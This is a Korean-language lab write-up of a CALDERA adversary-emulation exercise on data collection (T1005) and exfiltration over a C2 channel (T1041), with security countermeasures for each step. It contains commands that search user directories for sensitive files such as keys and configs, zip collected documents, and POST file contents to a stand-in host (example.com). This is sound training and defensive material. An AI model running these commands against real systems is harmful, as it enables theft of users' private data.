실습 CALDERA - 데이터 수집 및 유출

[Collection]

• 민감 데이터 수집
• 피해 시스템에 민감한 정보를 수집하여 유출하거나 분석 하려는 목적으로 저장
• 로컬 파일 파일 시스템에서 .docx, .pdf, .xls, xlsx 등 확장자를 가진 민감한 문서를 탐색 후 수집하여 하나의 zip 파일로 압축 후 외부로 전송하기 위한 형태로 준비

[T1005 Data from Local System(1)]

• 민감한 파일을 식별하고 수집 대상 정보를 선별하기 위해 디렉토리 및 파일 검색 명령 실행
• 특정 확장자를 가진 파일을 크기, 경로 조건 등과 함께 검색 할 수 있음

Command 설명

• find /Users : /Users 하위에서 파일 검색
• -name '*.#{file.sensitive.extension}' : 민감한 확장자를 가진 파일을 지정(예 : .key, .pem, .conf 등)
• -type f : 일반 파일만 대상

결과 설명

• 시스템에 존재하는 .png 확장자 이미지 파일 확인 됨
• 해당 정보로 사용자가 생성한 문서 첨부 이미지, 다양한 유형의 개인정보가 이미지 형태로 저장 됨 확인

보안 조치 사항

• 탐색 대상 경로 최소화 조치
• 특정 확장자의 파일 접근 모니터링
• DLP(Data Loss Prevention) 솔루션을 통해 민감 파일 수집 차단

[T1005 Data from Local System(2)]

• 로컬 시스템에 저장된 데이터(예 : 문서, 이미지 등)를 식별하고 복사 또는 압축하여 유출 준비에 사용
• 민감한 사용자 데이터를 탐지 후 외부 전송 및 후속 단계 악성 행위에 사용

Command 설명

• $startingDirectory = "C:\Users" : 파일 수집 시작 경로
• $outputZip = "PathToAtomicsFolder\..\ExternalPayloads\T1005" : 수집한 파일들을 압축하여 저장할 경로
• $fileExtensionsString = ".doc, .docs, .txt" : 수집 대상이 되는 파일의 확장자 지정

결과 설명

• 지정한 경로에서 민감 파일을 수집하여, 압축 파일 생성 성공

보안 조치 사항

• C:\ 전체 디렉토리에 대한 비인가 사용자 권한 제한
• 압축 도구 및 PowerShell 사용을 모니터링하여 탐지/차단 진행

[Exfiltration]

• 데이터 유출
• 공격자 이미 수집한 데이터를 외부로 유출하는 단계

[T1041 Exfiltration Over C2 Channel]

• C2(명령 및 제어) 채널을 통해 수집한 데이터를 외부로 유출
• HTTP, HTTPS, FTP, DNS 등 일반적으로 사용되는 프로토콜을 위장하거나 암호화하여 탐지 회피하면서 데이터 유출

Command 설명

• $filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt : LineNumbers.txt의 전체 내용을 $filecontent로 불러오기
• lnvoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive : 외부 서버( example.com)로 $filecontent 내용을 POST 방식으로 전송

결과 설명

• 지정한 C2서버로 압축 파일 성공적 업로드 확인

보안 조치 사항

• 외부로 나가는 HTTP POST 요청에 대해 특정 Content-Type이나 업로드 경로 필터 정책 적용
• 프록시/IDS를 통해 이상 트랙픽 탐지 및 차단 진행